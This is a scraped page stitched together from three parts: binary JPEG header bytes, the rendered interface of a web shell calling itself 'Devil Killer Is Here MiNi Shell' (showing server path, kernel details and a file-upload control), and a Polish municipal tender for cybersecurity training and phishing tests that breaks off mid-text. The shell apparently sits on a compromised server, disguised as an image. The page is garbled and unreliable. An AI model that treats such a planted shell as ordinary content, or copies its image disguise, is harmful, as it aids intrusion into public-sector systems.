JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250411/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250411/0018828701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Szkolenia dla pracowników Urzędu Gminy Poświętne, jednostek podległych oraz specjalistyczne kursy i szkolenia dla pracowników działu IT w ramach Projektu grantowego „Cyberbezpieczny Samorząd </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA POŚWIĘTNE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582693</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krótka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poświętne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-326</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">257520380</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugposwietne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaposwietne.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szkolenia dla pracowników Urzędu Gminy Poświętne, jednostek podległych oraz specjalistyczne kursy i szkolenia dla pracowników działu IT w ramach Projektu grantowego „Cyberbezpieczny Samorząd </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-09f4069d-5599-4761-a7e0-a78aea493ff9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00188287</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00042758/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Szkolenia dla pracowników Urzędu Gminy Poświętne, jednostek podległych oraz specjalistyczne kursy i szkolenia dla pracowników działu IT w ramach Projektu grantowego „Cyberbezpieczny Samorząd</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Cyberbezpieczny Samorząd” współfinansowanego przez Unię Europejską z Funduszy Europejskich na Rozwój Cyfrowy 2021-2027 (FERC) Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2. –Wzmocnienie krajowego systemu cyberbezpieczeństwa, na podstawie umowy o powierzenie grantu o numerze FERC.02.02-CS.01-001/23. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_poswietne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">za pomocą platformy https://platformazakupowa.pl/pn/gmina_poswietne</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rozdziałem XIII SWZ - XIII.<br/>SPOSÓB KOMUNIKACJI ORAZ WYJAŚNIENIA TREŚCI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 04.05.2016, str. 1 ze zm.), dalej RODO, Zamawiający informuje, że:<br/>1) Administratorem danych osobowych Wykonawcy (podwykonawcy lub podmiotu trzeciego) jest Gmina Poświętne, reprezentowana przez Wójta Gminy Poświętne z siedzibą, ulica Krótka 1, 05-326 Poświętne, z którym można się skontaktować: telefonicznie: 25 752- 03-80, za pośrednictwem poczty elektronicznej pod adresem e-mail: sekretariat@ugposwietne.pl<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem poczty elektronicznej: e-mail: iod@ugposwietne.pl lub pisemnie na adres Urzędu Gminy Poświętne, ul. Krótka 1, 05-326 Poświętne z dopiskiem „Inspektor Ochrony Danych”.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym art. 275 pkt 1 , a podstawą przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień spoczywających na<br/>Zamawiających, zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych, zwaną dalej ustawą P.Z.P.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP, a także podmioty z którymi Administrator zawarł stosowne umowy w celu realizacji ww. ustawowego zadania.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a następnie dokumentacja będzie przechowywana zgodnie z przepisami prawa dot. archiwizacji dokumentów.<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>8) Przysługuje Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby p stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą P.Z.P oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych, z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interes - BRAK MOŻLIWOŚĆI WPISANIA WIĘKSZEJ ILOŚCI ZNAKÓW. PEŁNA INFORMACJA PODANA JEST W<br/>ROZDZIALE II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 177447,32 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	CZĘŚĆ 1: <br/>Szkolenia z cyberbezpieczeństwa dla pracowników Urzędu Gminy i jednostek podległych z testowym phisingiem:<br/><br/>a)	przeprowadzenie szkolenia dedykowanego pracownikom Urzędu Gminy Poświętne i jednostek podległych (max. 200 uczestników) w zakresie cyberbezpieczeństwa, a następnie przeprowadzenie testów phishingowych na ich skrzynki mailowe;<br/>b)	szkolenie ma charakter stacjonarny i zostanie przeprowadzone w siedzibie Zamawiającego pod adresem: Urząd Gminy Poświętne, ul. Krótka 1, 05-326 Poświętne (powiat wołomiński), <br/>c)	szkolenie powinno być zorganizowane dla grup szkoleniowych po 20 osób (minimum 10 grup),<br/>d)	jednostką czasową szkolenia jest 1 godzina szkoleniowa (45 minut), przy czym szkolenie powinno trwać min. 3 godziny szkoleniowe dla 1 grupy szkoleniowej,<br/>e)	szkolenia będą odbywać się w dni robocze od wtorku do piątku w godzinach 7.30 – 15.30 w terminie uzgodnionym z Zamawiającym,<br/>f)	szkolenia będą prowadzone w języku polskim,<br/>g)	szkolenia prowadzone będą na podstawie zaakceptowanego przez Zamawiającego harmonogramu zawierającego zakres merytoryczny, dostarczonego przez Wykonawcę Zamawiającemu przed podpisaniem umowy,<br/>h)	Wykonawca zapewni:<br/>	materiały szkoleniowe dla każdego uczestnika szkolenia w postaci elektronicznej najpóźniej w dniu szkolenia,<br/>	imienny certyfikat z podpisem trenera, potwierdzający ukończenie szkolenia i jego zakres<br/>	lista obecności Uczestników szkolenia (dzienne, wypełniane oddzielnie każdego dnia szkolenia),<br/>	lista odbioru zaświadczeń o ukończeniu szkolenia.<br/>i)	Wymagana agenda szkolenia:<br/>- cyberbezpieczeństwo oraz zagrożenia w cyberprzestrzeni <br/>- omówienie poprawnych zasad związanych z cyberbezpieczeństwem i zagrożeniami w sieci takie jak phishing, ransomware oraz malware, <br/>- typy ataków np. kody QR, linki, Phishing, Typosquatting, ataki socjotechniczne<br/>- hasła i polityka haseł<br/>- zasady ochrony poczty elektronicznej<br/>- ochrona danych osobowych, wycieki danych<br/>- bezpieczeństwo fizyczne i zasady używania nośników danych<br/>- bezpieczeństwo w mediach społecznościowych<br/>- praca zdalna i jej bezpieczeństwo<br/>- kopie zapasowe i kopie bezpieczeństwa<br/>j)	w ramach wynagrodzenia Wykonawca dostarczy Zamawiającemu materiały ze szkolenia, które to będzie mógł wykorzystać do przeszkolenia osób nieobecnych lub nowoprzyjętych<br/>k)	przesłanie podpisanego protokołu zdawczo odbiorczego szkolenia, przygotowanego przez zleceniodawcę,<br/>l)	zamawiający zapewnia bezpłatny dostęp do pomieszczenia wyposażonego w rzutnik oraz dostęp do Internetu, na potrzeby szkolenia stacjonarnego,<br/>m)	po zakończeniu szkoleń Wykonawca w przeciągu 30 dni opracuje scenariusz ataku socjotechnicznego, dostosowanego do specyfiki działalności Zamawiającego, poprzez wysyłkę spreparowanych wiadomości e-mail. na adresy skrzynek mailowych pracowników Urzędu Gminy, oraz jednostek podległych (min. do 20% przeszkolonych). Wykonawca przeprowadzi testy w uzgodnionych terminach, z zachowaniem zasad poufności i etyki. Następnie prześle Zamawiającemu raport z analizy reakcji pracowników na przeprowadzone testy zawierający:<br/>- szczegółowy opis zastosowanych scenariuszy ataków.<br/>- ocena skuteczności przeprowadzonych testów, w tym statystyki dotyczące liczby<br/>pracowników, którzy padli ofiarą symulowanych ataków.<br/>- identyfikacja obszarów wymagających poprawy oraz rekomendacje działań<br/>naprawczych.<br/>Przesłany raport będzie stanowił podstawę wypłacenia Wykonawcy wynagrodzenia wynikającego z umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 63608,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Część 2: Dostęp do platformy z wiedzą o cyberbezpieczeństwie w formie e-lerningowej , oraz okresowymi testami dla pracowników Urzędu Gminy oraz jednostek podległych na okres 12 miesięcy:<br/><br/>a)	usługa na szkolenie w wersji elektronicznej (e-learning) z zakresu bezpieczeństwa informacji i bezpieczeństwa teleinformatycznego na okres 12-tu miesięcy dla 200 użytkowników. Szkolenie dedykowane dla pracowników biurowych (nietechnicznych) pracujących z komputerami i przetwarzających różnego rodzaju informacje o różnym poziomie poufności,<br/>b)	szkolenie zostanie udostępnione dla 200 uczestników na okres 12 miesięcy,<br/>c)	świadczenie usługi szkolenia musi obejmować: utworzenie indywidualnych kont dla pracowników, przesłanie danych dostępowych dla każdego pracownika przez email, świadczenie usług wsparcia technicznego dla uczestników szkolenia poprzez email oraz szczegółowe raportowanie aktywności uczestników na szkoleniu, z uwzględnieniem informacji o ukończeniu poszczególnych lekcji, wyniku testu końcowego. Częstotliwość dostarczania raportu: minimum 1 raz na tydzień,<br/>d)	forma szkolenia – e-learning,<br/>e)	szkolenie musi być w postaci oddzielnych lekcji dla każdej z kategorii z niżej opisanego zakresu. Szkolenie powinno zawierać minimum 30 slajdów dla jednej lekcji. Czas jednej lekcji (tematu) powinien oscylować średnio w granicach 15-30 min. Lekcje powinny być multimedialne z wykorzystaniem scenek rodzajowych z możliwością odtworzenia w postaci dźwiękowej z użyciem lektora. Nie mogą to być same zdjęcia, definicje lub zagadnienia opisane w formie tekstowej i odtwarzane w postaci dźwiękowej. Podczas lekcji powinna być na bieżąco weryfikowana wiedza (uwaga) użytkownika poprzez np. ćwiczenia sprawdzające,<br/>f)	Zakres tematyczny szkolenia - szkolenie musi posiadać oddzielne lekcje dla co najmniej następujących zagadnień:<br/>	czym jest bezpieczeństwo informacji;<br/>	aspekty prawne związane z bezpieczeństwem informacji;<br/>	czym jest phishing?;<br/>	zasady korzystania z Internetu;<br/>	zasady korzystania z portali społecznościowych;<br/>	zasady korzystania z poczty elektronicznej i zagrożenia z tym związane;<br/>	zasady korzystania z bezpiecznych haseł;<br/>	zagrożenia i sposoby zabezpieczania sprzętu mobilnego;<br/>	metody pozyskiwania informacji (socjotechnika);<br/>	bezpieczeństwo w zakresie płatności elektronicznych;<br/>	bezpieczeństwo fizyczne w zakresie zabezpieczania pomieszczeń, dokumentacji, sprzętu IT;<br/>	czym jest ransomware i jak wygląda w praktyce;<br/>	jak bezpiecznie korzystać z menedżera haseł w praktyce;<br/>	techniki stosowane przez cyberprzestępców;<br/>	uważaj by nie zostać „mułem finansowym”;<br/>	bezprzewodowe życie;<br/>	praca zdalna - jak zrealizować ją bezpiecznie?;<br/>	vishing… co to jest?;<br/>	phishing – stare problemy, nowe sposoby. Przykłady aktualnych cyberataków i sposoby ochrony przed nimi.;<br/>	jak cyberprzestępcy kradną dane przez telefon;<br/>	fake news i dezinformacja.;<br/>	jak zapewnić ciągłość działania.;<br/>	cloud. O co chodzi w chmurach obliczeniowych?;<br/>	AI - wielka szansa czy olbrzymie zagrożenie?;<br/>	NIS 2 - nowa dyrektywa - nowy poziom bezpieczeństwa w UE.;<br/>Na zakończenie szkolenia uczestnik musi zdać test z imiennym certyfikatem ukończenia kursu; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11236,26 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów.<br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = 